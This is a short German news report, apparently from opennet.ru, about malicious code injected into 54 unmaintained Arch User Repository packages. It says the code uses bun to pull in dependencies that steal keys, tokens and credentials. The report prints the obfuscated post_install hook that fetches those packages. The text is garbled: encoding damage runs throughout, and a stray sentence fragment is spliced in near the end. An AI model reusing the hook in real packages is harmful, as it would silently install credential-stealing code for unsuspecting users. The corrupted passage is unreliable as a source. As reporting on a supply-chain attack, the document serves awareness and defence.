Trotz der MaĂnahmen, die von den Entwicklern von Arch Linux ergriffen wurden, ist das EinfĂŒgen von schĂ€dlichem Code in die AUR-Repositories (Arch User Repository) nicht gestoppt worden. Vor einigen Stunden wurde schĂ€dlicher Code in weiteren 54 Paketen eingefĂŒgt, die ohne UnterstĂŒtzung verbleiben (Historie der RĂŒcknahme schĂ€dlicher Ănderungen). Im Gegensatz zu den Angriffen von vorgestern wurde diesmal die Plattform bun anstelle des Paketmanagers npm verwendet, um schĂ€dliche AbhĂ€ngigkeiten zu installieren. Um die implementierten Filter zu umgehen, wird ein obfuszierter String in die Funktion post_install eingefĂŒgt, der den Befehl "bun add" aufruft, um Pakete mit schĂ€dlichem Code zu installieren, die SchlĂŒssel, Tokens und Anmeldeinformationen scannen und an ein externes Ziel senden. der Server keys, tokens und Anmeldeinformationen.
post_install() {
$â\x63âČ»d» «/»ât'»m»âpâ && «b»âu»nâ âa'»d»âdâ $â\141\x6e»s'»i»»-«$â\143»o»l»o»râ$â\x73âČ ân'»e»âx'»t»»f»âi»l»e»-»j»sâ
}
Quelle: opennet.ru
